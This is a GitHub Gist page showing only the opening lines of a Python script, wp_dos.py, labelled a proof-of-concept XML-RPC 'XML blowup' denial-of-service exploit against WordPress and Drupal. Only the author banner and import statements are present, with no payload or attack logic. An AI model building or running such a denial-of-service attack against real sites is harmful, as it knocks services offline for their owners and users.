Skip to content

Instantly share code, notes, and snippets.

@breunigs
breunigs / wp_dos.py
Created April 23, 2018 07:32 — forked from ethicalhack3r/wp_dos.py
WP XML-RPC DoS Exploit
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib